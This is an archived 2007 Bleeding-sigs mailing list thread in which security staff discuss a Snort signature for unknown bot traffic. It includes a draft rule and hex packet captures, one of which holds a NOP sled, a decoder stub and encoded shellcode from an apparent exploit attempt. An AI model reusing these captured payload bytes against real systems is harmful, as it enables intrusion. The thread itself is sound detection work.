RE: New sig for unknown bot: msg#00152 security.ids.snort.bleedingsnort

I think that the packet data is consistent with a known W32.Sagevo
exploit. I am looking for the full content right now:

12:50:37.302768 IP ip-65-75-20-39.ct.dsl.ntplx.com.4516 >
192.168.81.2.2967: . 1:1461(1460) ack 1 win 17520
0x0000: 4500 05dc 3df0 4000 7506 5b0f 414b 1427 E...=.@.u.[.AK.'
0x0010: c0a8 5102 11a4 0b97 ee02 0319 8da7 24bc ..Q...........$.
0x0020: 5010 4470 d8ed 0000 0110 0f20 0a00 0000 P.Dp............
0x0030: 0218 0001 0000 0000 0024 0014 b7c9 d2d9 .........$......
0x0040: 3e33 ef34 251f 4300 0202 5c2f 6161 6161 >3.4%.C...\/aaaa
0x0050: 6161 6161 6161 6161 6161 6161 6161 6161 aaaaaaaaaaaaaaaa
0x0060: 6161 6161 6161 6161 6161 6161 6161 6161 aaaaaaaaaaaaaaaa
0x0070: 6161 6161 6161 6161 6161 6161 6161 6161 aaaaaaaaaaaaaaaa
0x0080: 6161 6161 6161 6161 6161 6161 6161 6161 aaaaaaaaaaaaaaaa

-----Original Message-----
From: bleeding-sigs-bounces-WwB1pFISwSkm7effSn6vN9HuzzzSOjJt@xxxxxxxxxxxxxxxx
[mailto:bleeding-sigs-bounces-WwB1pFISwSkm7effSn6vN9HuzzzSOjJt@xxxxxxxxxxxxxxxx]
On Behalf Of Matt
Jonkman
Sent: Monday, January 22, 2007 8:56 AM
To: Bleeding Sigs
Subject: Re: [Bleeding-sigs] New sig for unknown bot

What kind of web servers is it hitting? IIS, apache?

You able to grab a full session?

Matt

Jack Pepper wrote:

I don't know what's causing this, but that's just due to my own
laziness. I am seeing this on several https web servers. A long sled
of AA fillers in an https session? I dont think so. There is no chance
that https encryption could produce all these AAAAA.

The sig:

alert TCP $EXTERNAL_NET any -> $HOME_NET 443 (msg: "BLEEDING-EDGE VIRUS
incoming"; flow: established; content:"AAAAAAAAAAAAAAAAAAAAAAA";
classtype: trojan-activity; sid: xxxxxx; rev:1; )

The packet data:

19:19:05.584929 202.62.72.235.4957 > 192.168.1.26.https: .
0000 45 00 05 8c 98 d6 40 00 2d 06 da a9 ca 3e 48 eb |||
E.....@.-....>H.
0010 c0 a8 01 1a 13 5d 01 bb 80 42 0f 57 8a 2a b6 81 |||
.....]...B.W.*..
0020 80 10 20 10 54 66 00 00 01 01 08 0a 00 c0 a7 fc ||| ..
.Tf..........
0030 00 8c 69 f9 90 90 90 90 90 90 90 90 90 90 90 90 |||
..i.............
0040 90 90 90 90 eb 0e 5a 4a 31 c9 b1 99 80 34 11 fa |||
......ZJ1....4..
0050 e2 fa eb 05 e8 ed ff ff ff 13 7d fa fa fa a5 cb |||
..........}.....
0060 33 4f fe 73 31 ab cb 33 4b f9 cb 28 cb 3a 4a cd |||
3O.s1..3K..(.:J.
0070 37 7a 73 3c 73 38 7a 34 f2 bb cb 3a 4a cd 37 7a |||
7zs<s8z4...:J.7z
0080 73 30 77 b5 f2 73 2a b2 37 7a 73 2b 73 08 cb 3a |||
s0w..s*.7zs+s..:
0090 4a cd 37 7a a3 7b 85 f2 94 9f 8c 9f 8e fe 18 39 |||
J.7z.{.........9
00a0 11 47 cb 3a aa 92 8d ca ca 8e 73 1b 4a fe 73 38 |||
.G.:......s.J.s8
00b0 37 7a cb 33 cb 3a 4a c5 37 7a bb cb 3a 4a c5 37 |||
7z.3.:J.7z..:J.7
00c0 7a bb cb 3a 4a c5 37 7a 73 01 73 a5 f2 cb 3a 73 |||
z..:J.7zs.s...:s
00d0 bd f6 72 bd fd cb 28 77 b5 f2 4a f1 37 7a cb 21 |||
..r...(w..J.7z.!
00e0 73 22 ba 37 7a 12 8e 05 05 05 d5 98 93 94 d5 89 |||
s".7z...........
00f0 92 c5 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |||
..AAAAAAAAAAAAAA
0100 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |||
AAAAAAAAAAAAAAAA
0110 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |||
AAAAAAAAAAAAAAAA
0120 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |||
AAAAAAAAAAAAAAAA
0130 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |||
AAAAAAAAAAAAAAAA
0140 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |||
AAAAAAAAAAAAAAAA
0150 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |||
AAAAAAAAAAAAAAAA
0160 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |||
AAAAAAAAAAAAAAAA
0170 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |||
AAAAAAAAAAAAAAAA
0180 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |||
AAAAAAAAAAAAAAAA
0190 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |||
AAAAAAAAAAAAAAAA
01a0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |||
AAAAAAAAAAAAAAAA
01b0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |||
AAAAAAAAAAAAAAAA
01c0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |||
AAAAAAAAAAAAAAAA
01d0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |||
AAAAAAAAAAAAAAAA
01e0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |||
AAAAAAAAAAAAAAAA
01f0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |||
AAAAAAAAAAAAAAAA
0200 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |||
AAAAAAAAAAAAAAAA
0210 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |||
AAAAAAAAAAAAAAAA
0220 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |||
AAAAAAAAAAAAAAAA
0230 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |||
AAAAAAAAAAAAAAAA
0240 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |||
AAAAAAAAAAAAAAAA
0250 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |||
AAAAAAAAAAAAAAAA
0260 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |||
AAAAAAAAAAAAAAAA
0270 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |||
AAAAAAAAAAAAAAAA
0280 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |||
AAAAAAAAAAAAAAAA
0290 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |||
AAAAAAAAAAAAAAAA
02a0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |||
AAAAAAAAAAAAAAAA
02b0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |||
AAAAAAAAAAAAAAAA
02c0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |||
AAAAAAAAAAAAAAAA
02d0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |||
AAAAAAAAAAAAAAAA
02e0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |||
AAAAAAAAAAAAAAAA
02f0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |||
AAAAAAAAAAAAAAAA
0300 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |||
AAAAAAAAAAAAAAAA
0310 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |||
AAAAAAAAAAAAAAAA
0320 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |||
AAAAAAAAAAAAAAAA
0330 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |||
AAAAAAAAAAAAAAAA
0340 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |||
AAAAAAAAAAAAAAAA
0350 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |||
AAAAAAAAAAAAAAAA
0360 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |||
AAAAAAAAAAAAAAAA
0370 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |||
AAAAAAAAAAAAAAAA
0380 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |||
AAAAAAAAAAAAAAAA
0390 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |||
AAAAAAAAAAAAAAAA
03a0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |||
AAAAAAAAAAAAAAAA
03b0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |||
AAAAAAAAAAAAAAAA
03c0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |||
AAAAAAAAAAAAAAAA
03d0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |||
AAAAAAAAAAAAAAAA
03e0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |||
AAAAAAAAAAAAAAAA
03f0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |||
AAAAAAAAAAAAAAAA
0400 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |||
AAAAAAAAAAAAAAAA
0410 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |||
AAAAAAAAAAAAAAAA
0420 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |||
AAAAAAAAAAAAAAAA
0430 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |||
AAAAAAAAAAAAAAAA
0440 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |||
AAAAAAAAAAAAAAAA
0450 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |||
AAAAAAAAAAAAAAAA
0460 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |||
AAAAAAAAAAAAAAAA
0470 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |||
AAAAAAAAAAAAAAAA
0480 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |||
AAAAAAAAAAAAAAAA
0490 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |||
AAAAAAAAAAAAAAAA
04a0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |||
AAAAAAAAAAAAAAAA
04b0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |||
AAAAAAAAAAAAAAAA
04c0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |||
AAAAAAAAAAAAAAAA
04d0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |||
AAAAAAAAAAAAAAAA
04e0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |||
AAAAAAAAAAAAAAAA
04f0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |||
AAAAAAAAAAAAAAAA
0500 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |||
AAAAAAAAAAAAAAAA
0510 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |||
AAAAAAAAAAAAAAAA
0520 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |||
AAAAAAAAAAAAAAAA
0530 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |||
AAAAAAAAAAAAAAAA
0540 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |||
AAAAAAAAAAAAAAAA
0550 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |||
AAAAAAAAAAAAAAAA
0560 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |||
AAAAAAAAAAAAAAAA
0570 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |||
AAAAAAAAAAAAAAAA
0580 41 41 41 41 41 41 41 41 41 41 41 41 |||
AAAAAAAAAAAA....

-------------------------------------------------
Email solutions, MS Exchange alternatives and extrication,
security services, systems integration.
Contact: services-MMNQ1ylbVXZN8Ch2cx6nig@xxxxxxxxxxxxxxxx

_______________________________________________
Bleeding-sigs mailing list
Bleeding-sigs-WwB1pFISwSkm7effSn6vN9HuzzzSOjJt@xxxxxxxxxxxxxxxx
http://lists.bleedingthreats.net/cgi-bin/mailman/listinfo/bleeding-sigs

--
--------------------------------------------
Matthew Jonkman
Bleeding Edge Threats
765-429-0398
765-807-3060 fax
http://www.bleedingthreats.net
--------------------------------------------

PGP: http://www.bleedingthreats.com/mattjonkman.asc

_______________________________________________
Bleeding-sigs mailing list
Bleeding-sigs-WwB1pFISwSkm7effSn6vN9HuzzzSOjJt@xxxxxxxxxxxxxxxx
http://lists.bleedingthreats.net/cgi-bin/mailman/listinfo/bleeding-sigs

Previous by Date:	Rule Submit: Centrality IP Phone (PA-168 Chipset) Session Hijacking, Blake Hartstein
Next by Date:	Re: New sig for unknown bot, Matt Jonkman
Previous by Thread:	RE: New sig for unknown bot, Raitz, Alex
Next by Thread:	Re: New sig for unknown bot, Matt Jonkman
Indexes:	[Date] [Thread] [Top] [All Lists]

RE: New sig for unknown bot: msg#00152

security.ids.snort.bleedingsnort

Free Magazines